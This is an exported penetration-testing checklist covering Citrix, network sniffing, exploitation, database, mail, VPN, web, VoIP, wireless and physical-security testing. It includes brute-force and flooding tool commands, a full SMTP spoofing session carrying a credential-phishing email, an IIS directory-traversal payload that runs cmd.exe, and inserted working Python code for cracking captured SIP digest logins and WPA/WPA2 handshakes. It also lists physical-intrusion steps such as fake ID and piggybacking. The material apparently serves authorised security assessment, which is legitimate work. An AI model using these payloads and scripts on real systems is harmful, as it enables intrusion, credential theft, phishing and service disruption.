22.2.5.1.1. Citrix XML Service
22.2.5.1.2. Advanced Management Console
22.2.5.1.3. Citrix SSL Relay
22.2.5.1.4. ICA sessions
22.2.5.1.5. Server to server
22.2.5.1.6. Management Console to server
22.2.5.1.7. Session Reliability (Auto-reconnect)
22.2.5.1.8. License Management Console
22.2.5.1.9. License server
22.2.5.2. UDP
22.2.5.2.1. Clients to ICA browser service
22.2.5.2.2. Server-to-server
22.2.6. nmap nse scripts
22.2.6.1. citrix-enum-apps
22.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
22.2.6.2. citrix-enum-apps-xml
22.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
22.2.6.3. citrix-enum-servers
22.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>
22.2.6.4. citrix-enum-servers-xml
22.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
22.2.6.5. citrix-brute-xml
22.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
22.3. Scanning
22.3.1. Nessus
22.3.1.1. Plugins
22.3.1.1.1. CGI abuses
22.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
22.3.1.1.3. Misc.
22.3.1.1.4. Service Detection
22.3.1.1.5. Web Servers
22.3.1.1.6. Windows
22.3.2. Nikto
22.3.2.1. perl nikto.pl -host ip_address -port port_no.
22.3.2.1.1. Untitled
22.4. Exploitation
22.4.1. Alter default .ica files
22.4.1.1. InitialProgram=cmd.exe
22.4.1.2. InitialProgram=explorer.exe
22.4.2. Enumerate and Connect
22.4.2.1. For applications identified by Citrix-pa-scan
22.4.2.1.1. Pas
22.4.2.2. For published applications with a Citrix client when the master browser is non-public.
22.4.2.2.1. Citrix-pa-proxy
22.5. Brute Force
22.5.1. bforce.js
22.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
22.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
22.5.1.3. Untitled
22.6. Review Configuration Files
22.6.1. Application server configuration file
22.6.1.1. appsrv.ini
22.6.1.1.1. Location
22.6.1.1.2. World writeable
22.6.1.1.3. Review other files
22.6.1.1.4. Sample file
22.6.2. Program Neighborhood configuration file
22.6.2.1. pn.ini
22.6.2.1.1. Location
22.6.2.1.2. Review other files
22.6.2.1.3. Sample file
22.6.3. Citrix ICA client configuration file
22.6.3.1. wfclient.ini
22.6.3.1.1. Location
22.7. References
22.7.1. Vulnerabilities
22.7.1.1. Art of Hacking
22.7.1.2. Common Vulnerabilities and Exploits (CVE)
22.7.1.2.1. Sample file
22.7.1.2.2. Untitled
22.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
22.7.1.3. OSVDB
22.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search
22.7.1.4. Secunia
22.7.1.5. Security-database.com
22.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
22.7.1.6. SecurityFocus
22.7.2. Support
22.7.2.1. Citrix
22.7.2.1.1. Knowledge Base
22.7.2.2. Thinworld
22.7.3. Exploits
22.7.3.1. Milw0rm
22.7.3.1.1. http://www.milw0rm.com/search.php
22.7.3.2. Art of Hacking
22.7.3.2.1. Citrix
22.7.4. Tools Resource
22.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/ access
23. Network Backbone
23.1. Generic Toolset
23.1.1. Wireshark (Formerly Ethereal)
23.1.1.1. Passive Sniffing
23.1.1.1.1. Usernames/Passwords
23.1.1.1.2. Email
23.1.1.1.3. FTP
23.1.1.1.4. HTTP
23.1.1.1.5. HTTPS
23.1.1.1.6. RDP
23.1.1.1.7. VOIP
23.1.1.1.8. Other
23.1.1.2. Filters
23.1.1.2.1. ip.src == ip_address
23.1.1.2.2. ip.dst == ip_address
23.1.1.2.3. tcp.dstport == port_no.
23.1.1.2.4. ! ip.addr == ip_address
23.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
23.1.2. Cain & Abel
23.1.2.1. Active Sniffing
23.1.2.1.1. ARP Cache Poisoning
23.1.2.1.2. DNS Poisoning
23.1.2.1.3. Routing Protocols
23.1.3. Cisco-Torch
23.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
23.1.4. NTP-Fingerprint
23.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
23.1.5. Yersinia
23.1.6. p0f
23.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
23.1.7. Manual Check (Credentials required)
23.1.8. MAC Spoofing
23.1.8.1. mac address changer for windows
23.1.8.2. macchanger
23.1.8.2.1. Random Mac Address:- macchanger -r eth0
23.1.8.3. madmacs
23.1.8.4. smac
23.1.8.5. TMAC
24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
24.1. Password Attacks
24.1.1. Known Accounts
24.1.1.1. Identified Passwords
24.1.1.2. Unidentified Hashes
24.1.2. Default Accounts
24.1.2.1. Identified Passwords
24.1.2.2. Unidentified Hashes
24.2. Exploits
24.2.1. Successful Exploits
24.2.1.1. Accounts
24.2.1.1.1. Passwords
24.2.1.1.2. Groups
24.2.1.1.3. Other Details
24.2.1.2. Services
24.2.1.3. Backdoor
24.2.1.4. Connectivity
24.2.2. Unsuccessful Exploits
24.2.3. Resources
24.2.3.1. Securiteam
24.2.3.1.1. Exploits are sorted by year and must be downloaded individually
24.2.3.2. SecurityForest
24.2.3.2.1. Updated via CVS after initial install
24.2.3.3. GovernmentSecurity
24.2.3.3.1. Need to create an account to obtain access
24.2.3.4. Red Base Security
24.2.3.4.1. Oracle Exploit site only
24.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
24.2.3.5.1. Wireless Exploit Site
24.2.3.6. PacketStorm Security
24.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
24.2.3.7. SecWatch
24.2.3.7.1. Exploits sorted by year and month, downloaded separately
24.2.3.8. SecurityFocus
24.2.3.8.1. Exploits must be downloaded individually
24.2.3.9. Metasploit
24.2.3.9.1. Install and regularly update via svn
24.2.3.10. Milw0rm
24.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
24.3. Tools
24.3.1. Metasploit
24.3.1.1. Free Extra Modules
24.3.1.1.1. local copy
24.3.2. Manual SQL Injection
24.3.2.1. Understanding SQL Injection
24.3.2.2. SQL Injection walkthrough
24.3.2.3. SQL Injection by example
24.3.2.4. Blind SQL Injection
24.3.2.5. Advanced SQL Injection in SQL Server
24.3.2.6. More Advanced SQL Injection
24.3.2.7. Advanced SQL Injection in Oracle databases
24.3.2.8. SQL Cheatsheets
24.3.2.8.1. Untitled
24.3.3. SQL Power Injector
24.3.4. SecurityForest
24.3.5. SPI Dynamics WebInspect
24.3.6. Core Impact
24.3.7. Cisco Global Exploiter
24.3.8. PIXDos
24.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
24.3.9. CANVAS
24.3.10. Inguma
25. Server Specific Tests
25.1. Databases
25.1.1. Direct Access Interrogation
25.1.1.1. MS SQL Server
25.1.1.1.1. Ports
25.1.1.1.2. Version
25.1.1.1.3. osql
25.1.1.2. Oracle
25.1.1.2.1. Ports
25.1.1.2.2. TNS Listener
25.1.1.2.3. SQL Plus
25.1.1.2.4. Default Account/Passwords
25.1.1.2.5. Default SID's
25.1.1.3. MySQL
25.1.1.3.1. Ports
25.1.1.3.2. Version
25.1.1.3.3. Users/Passwords
25.1.1.4. DB2
25.1.1.5. Informix
25.1.1.6. Sybase
25.1.1.7. Other
25.1.2. Scans
25.1.2.1. Default Ports
25.1.2.2. Non-Default Ports
25.1.2.3. Instance Names
25.1.2.4. Versions
25.1.3. Password Attacks
25.1.3.1. Sniffed Passwords
25.1.3.1.1. Cracked Passwords
25.1.3.1.2. Hashes
25.1.3.2. Direct Access Guesses
25.1.4. Vulnerability Assessment
25.1.4.1. Automated
25.1.4.1.1. Reports
25.1.4.1.2. Vulnerabilities
25.1.4.2. Manual
25.1.4.2.1. Patch Levels
25.1.4.2.2. Confirmed Vulnerabilities
25.2. Mail
25.2.1. Scans
25.2.2. Fingerprint
25.2.2.1. Manual
25.2.2.2. Automated
25.2.3. Spoofable
25.2.3.1. Telnet spoof
25.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]
25.2.4. Relays
25.3. VPN
25.3.1. Scanning
25.3.1.1. 500 UDP IPSEC
25.3.1.2. 1723 TCP PPTP
25.3.1.3. 443 TCP/SSL
25.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
25.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
25.3.2. Fingerprinting
25.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
25.3.3. PSK Crack
25.3.3.1. ikeprobe 80.75.68.27
25.3.3.2. sniff for responses with C&A or ikecrack
25.4. Web
25.4.1. Vulnerability Assessment
25.4.1.1. Automated
25.4.1.1.1. Reports
25.4.1.1.2. Vulnerabilities
25.4.1.2. Manual
25.4.1.2.1. Patch Levels
25.4.1.2.2. Confirmed Vulnerabilities
25.4.2. Permissions
25.4.2.1. PUT /test.txt HTTP/1.0
25.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
25.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
   Content-Type: text/plain
   Content-Length: 6
25.4.3. Scans
25.4.4. Fingerprinting
25.4.4.1. Other
25.4.4.2. HTTP
25.4.4.2.1. Commands
25.4.4.2.2. Modules
25.4.4.2.3. File Extensions
25.4.4.3. HTTPS
25.4.4.3.1. Commands
25.4.4.3.2. Commands
25.4.4.3.3. File Extensions
25.4.5. Directory Traversal
25.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
26. VoIP Security
26.1. Sniffing Tools
26.1.1. AuthTool
26.1.2. Cain & Abel
26.1.3. Etherpeek
26.1.4. NetDude
26.1.5. Oreka
26.1.6. PSIPDump
26.1.7. SIPomatic
26.1.8. SIPv6 Analyzer
26.1.9. UCSniff
26.1.10. VoiPong
26.1.11. VOMIT
26.1.12. Wireshark
26.1.13. WIST - Web Interface for SIP Trace
26.2. Scanning and Enumeration Tools
26.2.1. enumIAX
26.2.2. fping
26.2.3. IAX Enumerator
26.2.4. iWar
26.2.5. Nessus
26.2.6. Nmap
26.2.7. SIP Forum Test Framework (SFTF)
26.2.8. SIPcrack
26.2.9. sipflanker
26.2.9.1. python sipflanker.py 192.168.1-254
26.2.10. SIP-Scan
26.2.11. SIP.Tastic
26.2.12. SIPVicious
26.2.13. SiVuS
26.2.14. SMAP
26.2.14.1. smap IP_Address/Subnet_Mask
26.2.14.2. smap -o IP_Address/Subnet_Mask
26.2.14.3. smap -l IP_Address
26.2.15. snmpwalk
26.2.16. VLANping
26.2.17. VoIPAudit
26.2.18. VoIP GHDB Entries
26.2.19. VoIP Voicemail Database
26.3. Packet Creation and Flooding Tools
26.3.1. H.323 Injection Files
26.3.2. H225regreject
26.3.3. IAXHangup
26.3.4. IAXAuthJack
26.3.5. IAX.Brute
26.3.6. IAXFlooder
26.3.6.1. ./iaxflood sourcename destinationname numpackets
26.3.7. INVITE Flooder
26.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
26.3.8. kphone-ddos
26.3.9. RTP Flooder
26.3.10. rtpbreak
26.3.11. Scapy
26.3.12. Seagull
26.3.13. SIPBomber
26.3.14. SIPNess
26.3.15. SIPp
26.3.16. SIPsak
26.3.16.1. Tracing paths: sipsak -T -s sip:[email protected]
26.3.16.2. OPTIONS request: sipsak -vv -s sip:[email protected]
26.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]
26.3.17. SIP-Send-Fun
26.3.18. SIPVicious
26.3.19. Spitter
26.3.20. TFTP Brute Force
26.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
26.3.21. UDP Flooder
26.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
26.3.22. UDP Flooder (with VLAN Support)
26.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
26.3.23. Voiphopper
26.4. Fuzzing Tools
26.4.1. Asteroid
26.4.2. Codenomicon VoIP Fuzzers
26.4.3. Fuzzy Packet
26.4.4. Mu Security VoIP Fuzzing Platform
26.4.5. ohrwurm RTP Fuzzer
26.4.6. PROTOS H.323 Fuzzer
26.4.7. PROTOS SIP Fuzzer
26.4.8. SIP Forum Test Framework (SFTF)
26.4.9. Sip-Proxy
26.5. Signaling Manipulation Tools
26.5.1. AuthTool
26.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
26.5.2. BYE Teardown
26.5.3. Check Sync Phone Rebooter
26.5.4. RedirectPoison
26.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
26.5.5. Registration Adder
26.5.6. Registration Eraser
26.5.7. Registration Hijacker
26.5.8. SIP-Kill
26.5.9. SIP-Proxy-Kill
26.5.10. SIP-RedirectRTP
26.5.11. SipRogue
26.5.12. vnak
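What AuthTool (26.5.1) and SIPcrack (26.2.8) do with a captured REGISTER, as an added example that is not from the original page or either tool: parse the Authorization header, then recompute the RFC 3261 / RFC 2617 digest for every dictionary word until one reproduces the captured response. The REGISTER below is constructed with a known password; the realm, nonce and addresses are placeholders.

```python
"""Offline dictionary attack on SIP digest authentication.

Added example, not from the original page. A sniffed request with an
Authorization header reveals username, realm, nonce, uri and the response;
the password is the only unknown:

    HA1      = MD5(username:realm:password)
    HA2      = MD5(method:uri)
    response = MD5(HA1:nonce:HA2)                   without qop
    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)     with qop=auth
"""
import hashlib
import re

_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')   # name="quoted" or name=token


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(p, method, password):
    """Digest a client would send for challenge params p and this password."""
    ha1 = _md5("%s:%s:%s" % (p["username"], p["realm"], password))
    ha2 = _md5("%s:%s" % (method, p["uri"]))
    if p.get("qop"):
        return _md5(":".join([ha1, p["nonce"], p["nc"], p["cnonce"], p["qop"], ha2]))
    return _md5("%s:%s:%s" % (ha1, p["nonce"], ha2))


def parse_sip_auth(message):
    """Return (method, digest params) from a SIP request's Authorization header."""
    request_line, _, headers = message.partition("\r\n")
    method = request_line.split(" ", 1)[0]
    m = re.search(r"^(?:Proxy-)?Authorization:\s*Digest\s*(.+?)\r\n", headers, re.M | re.I)
    if not m:
        raise ValueError("no Digest Authorization header in message")
    params = {name: quoted or token for name, quoted, token in _PARAM.findall(m.group(1))}
    return method, params


def crack_sip(message, wordlist):
    """Return the password that reproduces the captured response, or None."""
    method, p = parse_sip_auth(message)
    target = p["response"].lower()
    for word in wordlist:
        if digest_response(p, method, word) == target:
            return word
    return None


def constructed_register(password, qop=False):
    """Build a REGISTER whose digest was computed with `password` (demo data)."""
    p = {"username": "100", "realm": "asterisk", "nonce": "3f1c9a0e",
         "uri": "sip:pbx.example"}
    if qop:
        p.update(qop="auth", nc="00000001", cnonce="0a4f113b")
    p["response"] = digest_response(p, "REGISTER", password)
    auth = ", ".join(('%s=%s' if k in ("qop", "nc") else '%s="%s"') % (k, v)
                     for k, v in p.items())
    return ("REGISTER sip:pbx.example SIP/2.0\r\n"
            "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
            "From: <sip:100@pbx.example>;tag=1928301774\r\n"
            "To: <sip:100@pbx.example>\r\n"
            "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
            "CSeq: 2 REGISTER\r\n"
            "Authorization: Digest " + auth + "\r\n"
            "Content-Length: 0\r\n\r\n")


if __name__ == "__main__":
    print(crack_sip(constructed_register("1234"), ["admin", "1234", "secret"]))
```

Three MD5 operations per guess means numeric extension passwords fall in seconds; the finding to report is cleartext SIP on the wire and weak credentials, not the digest scheme itself.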
26.6. Media Manipulation Tools
26.6.1. RTP InsertSound
26.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
26.6.2. RTP MixSound
26.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
26.6.3. RTPProxy
26.6.4. RTPInject
26.7. Generic Software Suites
26.7.1. OAT - Office Communication Server Assessment Tool
26.7.2. EnableSecurity VOIPPACK
26.7.2.1. Note: add-on for Immunity CANVAS
26.8. References
26.8.1. URLs
26.8.1.1. Common Vulnerabilities and Exposures (CVE)
26.8.1.1.1. Vulnerability and exploit information relating to these products can be found at: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
26.8.1.2. Default Passwords
26.8.1.3. Hacking Exposed VoIP
26.8.1.3.1. Tool Pre-requisites
26.8.1.4. VoIPsa
26.8.2. White Papers
26.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
26.8.2.2. An Analysis of VoIP Security Threats and Tools
26.8.2.3. Hacking Exposed VoIP
26.8.2.4. Security testing of SIP implementations
26.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
26.8.2.6. Two attacks against VoIP
26.8.2.7. VoIP Attacks!
26.8.2.8. VoIP Security Audit Program (VSAP)
26.8.3. Spirent ThreatEx
27. Wireless Penetration
27.1. Wireless Assessment
The following information should ideally be obtained/enumerated when carrying out a wireless assessment. All of it is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.
27.1.1. Site Map
27.1.1.1. RF Map
27.1.1.1.1. Lines of Sight
27.1.1.1.2. Signal Coverage
27.1.1.2. Physical Map
27.1.1.2.1. Triangulate APs
27.1.1.2.2. Satellite Imagery
27.1.2. Network Map
27.1.2.1. MAC Filter
27.1.2.1.1. Authorised MAC Addresses
27.1.2.1.2. Reaction to Spoofed MAC Addresses
27.1.2.2. Encryption Keys utilised
27.1.2.2.1. WEP
27.1.2.2.2. WPA/PSK
27.1.2.2.3. 802.1x
27.1.2.3. Access Points
27.1.2.3.1. ESSID
27.1.2.3.2. BSSIDs
27.1.2.4. Wireless Clients
27.1.2.4.1. MAC Addresses
27.1.2.4.2. Intercepted Traffic
27.4. Wireless Toolkit
27.4.1. Wireless Discovery
27.4.1.1. Aerosol
27.4.1.2. Airfart
27.4.1.3. Aphopper
27.4.1.4. Apradar
27.4.1.5. BAFFLE
27.4.1.6. inSSIDer
27.4.1.7. iWEPPro
27.4.1.8. karma
27.4.1.9. KisMAC-ng
27.4.1.10. Kismet
27.4.1.11. MiniStumbler
27.4.1.12. Netstumbler
27.4.1.13. Vistumbler
27.4.1.14. Wellenreiter
27.4.1.15. Wifi Hopper
27.4.1.16. WirelessMon
27.4.1.17. WiFiFoFum
27.4.2. Packet Capture
27.4.2.1. Airopeek
27.4.2.2. Airpcap
27.4.2.3. Airtraf
27.4.2.4. Apsniff
27.4.2.5. Cain
27.4.2.6. Commview
27.4.2.7. Ettercap
27.4.2.8. Netmon
27.4.2.8.1. nmwifi
27.4.2.9. Wireshark
27.4.3. EAP Attack tools
27.4.3.1. eapmd5pass
27.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
27.4.4. Leap Attack Tools
27.4.4.1. asleap
27.4.4.2. thc leap cracker
27.4.4.3. anwrap
27.4.5. WEP/ WPA Password Attack Tools
27.4.5.1. Airbase
27.4.5.2. Aircrack-ptw
27.4.5.3. Aircrack-ng
27.4.5.4. Airsnort
27.4.5.5. cowpatty
27.4.5.6. FiOS Wireless Key Calculator
27.4.5.7. iWifiHack
27.4.5.8. KisMAC-ng
27.4.5.9. Rainbow Tables
27.4.5.10. wep attack
27.4.5.11. wep crack
27.4.5.12. wzcook
27.4.6. Frame Generation Software
27.4.6.1. Airgobbler
27.4.6.2. airpwn
27.4.6.3. Airsnarf
27.4.6.4. Commview
27.4.6.5. fake ap
27.4.6.6. void 11
27.4.6.7. wifi tap
27.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
27.4.6.8. FreeRADIUS - Wireless Pwnage Edition
27.4.7. Mapping Software
27.4.7.1. Online Mapping
27.4.7.1.1. WIGLE
27.4.7.1.2. Skyhook
27.4.7.2. Tools
27.4.7.2.1. Knsgem
27.4.8. File Format Conversion Tools
27.4.8.1. ns1 recovery and conversion tool
27.4.8.2. warbable
27.4.8.3. warkizniz
27.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
27.4.8.4. ivstools
27.4.9. IDS Tools
27.4.9.1. WIDZ
27.4.9.2. War Scanner
27.4.9.3. Snort-Wireless
27.4.9.4. AirDefense
27.4.9.5. AirMagnet
27.5. WLAN discovery
27.5.1. Unencrypted WLAN
27.5.1.1. Visible SSID
27.5.1.1.1. Sniff for IP range
27.5.1.2. Hidden SSID
27.5.1.2.1. Deauth client
27.5.2. WEP encrypted WLAN
27.5.2.1. Visible SSID
27.5.2.1.1. WEPattack
27.5.2.2. Hidden SSID
27.5.2.2.1. Deauth client
27.5.3. WPA / WPA2 encrypted WLAN
27.5.3.1. Deauth client
27.5.3.1.1. Capture EAPOL handshake
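Once the EAPOL handshake is captured, the attack is entirely offline; this added example (not from the original page and not aircrack-ng's or cowpatty's code, which do the same derivation in 27.4.5) shows why only message 2 plus both MACs and both nonces are needed. For each candidate passphrase it derives the PMK with PBKDF2, the PTK with the 802.11i PRF, and the MIC over the EAPOL-Key frame, then compares with the MIC in the frame. The handshake is synthesised for a known passphrase; MACs, nonces and the SSID are placeholders. The IEEE "password"/"IEEE" PMK test vector is used in the test to check the derivation.

```python
"""Dictionary attack on a captured WPA/WPA2-PSK four-way handshake.

Added example, not from the original page. Per IEEE 802.11i:

    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)
    PTK = PRF(PMK, "Pairwise key expansion",
              min(AA,SPA) | max(AA,SPA) | min(ANonce,SNonce) | max(ANonce,SNonce))
    KCK = PTK[0:16]
    MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]   (CCMP, descriptor v2)
          HMAC-MD5 (KCK, ...)                                 (TKIP, descriptor v1)

Handshake data below is constructed, not captured.
"""
import hashlib
import hmac
import struct

# EAPOL(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32)
# + IV(16) + RSC(8) + ID(8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


def pmk(passphrase, ssid):
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label | 0x00 | data | i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), "sha1").digest()
    return out[:nbytes]


def ptk(pmk_, aa, spa, anonce, snonce, nbytes=48):
    """PTK (48 bytes suffices for CCMP; KCK is the first 16 either way)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk_, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, frame, ccmp=True):
    """MIC over the EAPOL-Key frame with its own MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if ccmp:
        return hmac.new(kck, zeroed, "sha1").digest()[:16]
    return hmac.new(kck, zeroed, "md5").digest()


def crack(hs, wordlist):
    """Return the passphrase that reproduces the captured MIC, or None."""
    frame = hs["eapol2"]
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = ptk(pmk(word, hs["ssid"]), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, frame, hs["ccmp"]), captured):
            return word
    return None


def constructed_handshake(passphrase, ssid="corp-wifi", ccmp=True):
    """Synthesise message 2 of a four-way handshake for a known passphrase."""
    aa = bytes.fromhex("00112233aabb")          # AP (authenticator) MAC, placeholder
    spa = bytes.fromhex("66778899ccdd")         # client (supplicant) MAC, placeholder
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    key_info = 0x010a if ccmp else 0x0109       # Pairwise | MIC | descriptor version 2 or 1
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce + b"\x00" * 16
            + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + struct.pack(">H", 0))
    frame = b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL v1, type 3 (Key)
    kck = ptk(pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, ccmp)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol2": frame, "ccmp": ccmp}


if __name__ == "__main__":
    hs = constructed_handshake("correct horse")
    print(crack(hs, ["password", "correct horse", "letmein"]))
```

The 4096-iteration PBKDF2 dominates the cost and is keyed by SSID, which is why precomputed tables (27.4.5.9) only help against common SSIDs and why a unique SSID plus a long passphrase is the practical defence.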
27.5.4. LEAP encrypted WLAN
27.5.4.1. Deauth client
27.5.4.1.1. Break LEAP
27.5.5. 802.1x WLAN
27.5.5.1. Create Rogue Access Point
27.5.5.1.1. Airsnarf
27.5.5.1.2. fake ap
27.5.5.1.3. Hotspotter
27.5.5.1.4. Karma
27.5.5.1.5. Linux rogue AP
27.5.6. Resources
27.5.6.1. URLs
27.5.6.1.1. Wirelessdefence.org
27.5.6.1.2. Russix
27.5.6.1.3. Wardrive.net
27.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
27.5.6.2. White Papers
27.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
27.5.6.2.2. 802.11b Firmware-Level Attacks
27.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
27.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
27.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds
27.5.6.2.6. PEAP: Pwned Extensible Authentication Protocol (ShmooCon 2008, Wright & Antoniewicz)
27.5.6.2.7. Active behavioral fingerprinting of wireless devices
27.5.6.3. Common Vulnerabilities and Exposures (CVE)
27.5.6.3.1. Vulnerability and exploit information relating to these products can be found at: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
28. Physical Security
28.1. Building Security
28.1.1. Meeting Rooms
28.1.1.1. Check for active network jacks.
28.1.1.2. Check for any information in room.
28.1.2. Lobby
28.1.2.1. Check for active network jacks.
28.1.2.2. Does receptionist/guard leave lobby?
28.1.2.3. Accessible printers? Print a test page.
28.1.2.4. Obtain phone/personnel listing.
28.1.3. Communal Areas
28.1.3.1. Check for active network jacks.
28.1.3.2. Check for any information in room.
28.1.3.3. Listen for employee conversations.
28.1.4. Room Security
28.1.4.1. Resistance of lock to picking.
28.1.4.1.1. What types of lock are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
28.1.4.2. Ceiling access areas.
28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
28.1.5. Windows
28.1.5.1. Check windows/doors for visible intruder alarm sensors.
28.1.5.2. Check visible areas for sensitive information.
28.1.5.3. Can you video users logging on?
28.2. Perimeter Security
28.2.1. Fence Security
28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
28.2.2. Exterior Doors
28.2.2.1. If there is no perimeter fence, determine whether exterior doors are secured, guarded, monitored, etc.
28.2.3. Guards
28.2.3.1. Patrol Routines
28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
28.2.3.2. Communications
28.2.3.2.1. Intercept and analyse guard communications. Determine whether the communication methods can be used to aid a physical intrusion.
28.3. Entry Points
28.3.1. Guarded Doors
28.3.1.1. Piggybacking
28.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
28.3.1.2. Fake ID
28.3.1.2.1. Attempt to use fake ID to gain access.
28.3.1.3. Access Methods
28.3.1.3.1. Test 'out of hours' entry methods
28.3.2. Unguarded Doors
28.3.2.1. Identify all unguarded entry points.
28.3.2.1.1. Are doors secured?
28.3.2.1.2. Check locks for resistance to lock picking.
28.3.3. Windows
28.3.3.1. Check windows/doors for visible intruder alarm sensors.
28.3.3.1.1. Attempt to bypass sensors.
28.4. Office Waste
28.4.1. Dumpster Diving
